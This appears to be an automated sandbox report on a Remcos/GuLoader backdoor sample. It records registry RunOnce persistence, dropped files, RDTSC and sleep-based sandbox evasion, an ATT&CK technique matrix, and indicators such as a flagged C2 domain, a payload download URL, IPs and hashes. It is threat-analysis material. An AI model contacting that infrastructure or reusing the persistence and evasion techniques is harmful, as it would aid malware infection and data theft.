          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scrJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scrJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeAPI/Special instruction interceptor: Address: 6793428
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeAPI/Special instruction interceptor: Address: 2AF3428
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRDTSC instruction interceptor: First address: 6755CA0 second address: 6755CA0 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD824C772E6h 0x00000008 cmp ch, ah 0x0000000a inc ebp 0x0000000b jmp 00007FD824C7734Eh 0x0000000d test dl, al 0x0000000f inc ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeRDTSC instruction interceptor: First address: 2AB5CA0 second address: 2AB5CA0 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD8255F9296h 0x00000008 cmp ch, ah 0x0000000a inc ebp 0x0000000b jmp 00007FD8255F92FEh 0x0000000d test dl, al 0x0000000f inc ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeWindow / User API: threadDelayed 1469Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeWindow / User API: threadDelayed 8520Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564Thread sleep count: 1469 > 30Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564Thread sleep time: -4407000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564Thread sleep count: 8520 > 30Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564Thread sleep time: -25560000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00406444 FindFirstFileA,FindClose,0_2_00406444
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405909
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00406444 FindFirstFileA,FindClose,1_2_00406444
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00402765 FindFirstFileA,1_2_00402765
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 1_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405909
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW=A
          Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C4C000.00000004.00000020.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeAPI call chain: ExitProcess graph end nodegraph_0-3311
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeAPI call chain: ExitProcess graph end nodegraph_0-3492
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeProcess created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeCode function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403384

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: C:\Users\user\Desktop\IpykYx5iwz.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-A65UIXJump to behavior
          Source: Yara matchFile source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation11
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          11
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          11
          Process Injection
          1
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Clipboard Data
          1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Remote Access Software
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          11
          Process Injection
          NTDS3
          File and Directory Discovery
          Distributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets23
          System Information Discovery
          SSHKeylogging2
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture113
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          IpykYx5iwz.exe66%VirustotalBrowse
          IpykYx5iwz.exe50%ReversingLabsWin32.Backdoor.Remcos
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll3%ReversingLabs
          C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr50%ReversingLabsWin32.Backdoor.Remcos
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binL0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin80%Avira URL Cloudsafe
          subddfg.lol100%Avira URL Cloudmalware
          https://www.healthselflesssupplies.co.za/0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8m0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/q0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          subddfg.lol
          94.156.177.164
          truetrue
            unknown
            healthselflesssupplies.co.za
            164.160.91.32
            truefalse
              unknown
              www.healthselflesssupplies.co.za
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                subddfg.loltrue
                • Avira URL Cloud: malware
                unknown
                https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.healthselflesssupplies.co.za/qIpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binLIpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorIpykYx5iwz.exe, Reaccented.scr.1.drfalse
                  high
                  https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorIpykYx5iwz.exe, Reaccented.scr.1.drfalse
                    high
                    https://www.healthselflesssupplies.co.za/IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8mIpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    94.156.177.164
                    subddfg.lolBulgaria
                    43561NET1-ASBGtrue
                    164.160.91.32
                    healthselflesssupplies.co.zaSouth Africa
                    328037ElitehostZAfalse
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1588020
                    Start date and time:2025-01-10 20:37:32 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:IpykYx5iwz.exe
                    renamed because original name is a hash value
                    Original Sample Name:5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@3/18@2/2
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 89%
                    • Number of executed functions: 53
                    • Number of non-executed functions: 65
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target IpykYx5iwz.exe, PID 180 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    14:39:28API Interceptor3528411x Sleep call for process: IpykYx5iwz.exe modified
                    19:38:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr
                    19:38:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    164.160.91.32KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            subddfg.lolz1Quotation.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 23.106.238.209
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NET1-ASBGQUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                            • 94.156.177.117
                            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                            • 95.87.199.40
                            Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                            • 93.123.77.220
                            Kloki.arm7.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.m68k.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.x86_64.elfGet hashmaliciousUnknownBrowse
                            • 83.222.189.67
                            Kloki.x86.elfGet hashmaliciousUnknownBrowse
                            • 83.222.190.214
                            Kloki.arm4.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.spc.elfGet hashmaliciousUnknownBrowse
                            • 83.222.191.90
                            Kloki.arm5.elfGet hashmaliciousUnknownBrowse
                            • 83.222.189.126
                            ElitehostZAKO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                            • 164.160.91.32
                            https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                            • 164.160.91.37
                            https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6Get hashmaliciousUnknownBrowse
                            • 164.160.91.31
                            https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==Get hashmaliciousUnknownBrowse
                            • 164.160.91.31
                            http://www.fire.co.zaGet hashmaliciousUnknownBrowse
                            • 164.160.91.17
                            https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=Get hashmaliciousUnknownBrowse
                            • 164.160.91.23
                            https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                            • 164.160.91.23
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                            • 164.160.91.32
                            ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            • 164.160.91.32
                            r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                            • 164.160.91.32
                            RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 164.160.91.32
                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                            • 164.160.91.32
                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                            • 164.160.91.32
                            Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                            • 164.160.91.32
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dllH33UCslPzv.exeGet hashmaliciousXWormBrowse
                              sgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                                c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                  https://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exeGet hashmaliciousUnknownBrowse
                                    5006_2.6.2.exeGet hashmaliciousUnknownBrowse
                                      ocs-office.exeGet hashmaliciousUnknownBrowse
                                        jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          jU0hAXFL0k.exeGet hashmaliciousGuLoaderBrowse
                                            #U4e5d#U6708#U58f0#U660e_40981677.xlsGet hashmaliciousGuLoaderBrowse
                                              MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):49
                                                Entropy (8bit):4.849204231782005
                                                Encrypted:false
                                                SSDEEP:3:1ThK5AQLQIfLBJXlFGfv:1Th9QkIPeH
                                                MD5:0F375612A0BD6760193A3C4991458244
                                                SHA1:EB53D5B0A1AF8007D55B2CD5CFE59D7B71E3C45E
                                                SHA-256:B4E2FF74D450A8D4FD3176A125CE941F6E6104038148AE87E01126F78904C745
                                                SHA-512:4E760C53C1C092B634ED20CA73E7E1A5098957939A6F8E2D361316A3E65104757343DBBC1126630AAB56F06FDB080979E311C28684185FEC236438282804FC36
                                                Malicious:false
                                                Reputation:low
                                                Preview:[ExPaBoot]..Acco=user32::EnumWindows(i r2 ,i 0)..
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:OpenPGP Secret Key
                                                Category:dropped
                                                Size (bytes):46389745
                                                Entropy (8bit):0.2607043114540284
                                                Encrypted:false
                                                SSDEEP:6144:l91tPV4thxsoc1hW/33G8nk7ZtD0xHuGpwbRRYBr75TE+ZFoPgU3dKZheW2yF:7jUG8nxH2RRmFTE+ZFytKh
                                                MD5:08130CFCB834BC0FFE63E3334A3EC1AA
                                                SHA1:21DE65F7200E61BFAA18DE5631BAB75602375A70
                                                SHA-256:594526843DD66FBB0CCBAE1F1A8984CBDF2DCB2AA8A15A27160F6472C2A2699F
                                                SHA-512:A8D965AF77FA784E12E34F4E33D7912A88E56CF8E1590686BD99334A15F58DB78FAE49190AC22C6EDB02A91ACD7BF03AB203C25D31EF636B7A5015FF7E483ACB
                                                Malicious:false
                                                Reputation:low
                                                Preview:........,...................o................................................................................w..............................................................................................................................................................................J...N...............j...........................................................................................................................................,...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.854901984552606
                                                Encrypted:false
                                                SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                MD5:0063D48AFE5A0CDC02833145667B6641
                                                SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 3%
                                                Joe Sandbox View:
                                                • Filename: H33UCslPzv.exe, Detection: malicious, Browse
                                                • Filename: sgJV11UlDP.exe, Detection: malicious, Browse
                                                • Filename: c56D7_Receipt.vbs, Detection: malicious, Browse
                                                • Filename: , Detection: malicious, Browse
                                                • Filename: 5006_2.6.2.exe, Detection: malicious, Browse
                                                • Filename: ocs-office.exe, Detection: malicious, Browse
                                                • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                • Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse
                                                • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):1727984
                                                Entropy (8bit):7.996364301455999
                                                Encrypted:true
                                                SSDEEP:24576:t9tWunuwwAghUBUQyXGF8X0VMMOFdYHJStLidtLw8tWVq6VdbcGstKR18+YDQZp:NWtP4+P0Vn+dYHMwwjbV6Gst2aDQZp
                                                MD5:15214C528C41DE4D5E542EBD3D4AC075
                                                SHA1:BDAB48D323AB0E0C4689061DB5FB08ADFE1AFEC8
                                                SHA-256:5AEB1293C473A66795BF0FF3A7892E6A6CF70AEA5248A38F204632A5FDBE1F63
                                                SHA-512:02B6635E4F1A98765E65EE14DB0E93AB8DFDF4C7C0086ADDAD86E4A09466AE49DC66ACCDA0BC142828656FCA994EB99255EA4C762FFC9F6706410E4877CC9FC2
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.*....F..G.w.F.*....F..v..F...@..F.Rich.F.........PE..L......].................b...........3............@.................................o\....@.................................0........p..`............V..h............................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...8............z..............@....ndata... ...P...........................rsrc...`....p.......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):27
                                                Entropy (8bit):4.134336113194451
                                                Encrypted:false
                                                SSDEEP:3:iGAeSMn:lAeZ
                                                MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[Access]..Setting=Enabled..
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):7053049
                                                Entropy (8bit):0.15920537986619068
                                                Encrypted:false
                                                SSDEEP:768:QTcqyBjj1qaSsYNbTloIg+dMOUSFvsBxb0pPpU+ICFqCJGPPaUwoJodbe2uSS3zs:/D7Dee
                                                MD5:620747169DC6815B41CFAFBC1C63DE34
                                                SHA1:5C4188DCD3A15D4E4A6F31A372368DF2E7E894F8
                                                SHA-256:E67B5ED0CE69F90ABBCD1D97A13B3764EE02E3CEEC7B6451D61FA5E7527376D2
                                                SHA-512:E054D5AF678EDFE95D2403D793426B0CEEE39364E44A34B28D9195C10C58031FF86E2184030357EA6CAA4530306D27C97752C1CF47C842B1DB086DE21E804470
                                                Malicious:false
                                                Reputation:low
                                                Preview:............................................................................................................................................................................................................................................................................................................................@.........................................?.........................=...............................................................................................................................................................................................................................................................................................,......................................................................................................................................................................................................................................................................................R................................................
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):282409
                                                Entropy (8bit):7.539089060973123
                                                Encrypted:false
                                                SSDEEP:6144:kV4thxsoc1hW/33G8nk7ZtD0xHuGpwbRRYV:QUG8nxH2RRI
                                                MD5:4E7C6200C8B194A91D15B4206F109CAA
                                                SHA1:0B06491801F962674178923392A59AE7943E7E00
                                                SHA-256:CA639A96999216A68DAEAB7529D09DBA8F35D4449DCD36DC036C8E8BABB3078B
                                                SHA-512:7910AE1185D498475FF78B7593C80C7D7C5F5FA51BAD0BEF40010A992FF9BF3C1982177A84588C22E0EB6525D53439540C4FC99155E3418463CB1F3FC77C8DE7
                                                Malicious:false
                                                Preview:./...........**......***..8......///.....GG.........~.....N.................a......y."""...................................CCCC.........x.......P................&.........sss..........GGGG.............rrr...................P......PP.U........C...m........l....[......{..*..................X...............zz.....nn...eee..**..........w...................n...............s..............////............s................=.....8.................[."..,.......4....S.uu............................................\.ffff....t..........11..........................!..hhhh......z.??.......wwww........^^.....e.....q.......).......==...._......rrr............II....(..RRRR.V.........;.ss.....|...m....p.ww......o.!...........................yyyy...................(...................d....7...............................i.................C.E.........333.hh.!..:::..____....j.....................??...........lll.m.. ..............].C..C..##..c.....................................%%..............C...p.......
                                                Process:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):155054
                                                Entropy (8bit):4.606128415946002
                                                Encrypted:false
                                                SSDEEP:1536:v8/VFzzxaCNHbPfvGOm7fGZwpWYhu81CABO1UDVrUEog+AdMIqXczZgmk2m5:k7xxRTf+n+ZwXtRBO2VPg0/3m5
                                                MD5:836B92F0A4928C14C98DF4B3FCC0797F
                                                SHA1:9D494C2D5332C4D4F799C215BD8C260A8A2D3C99
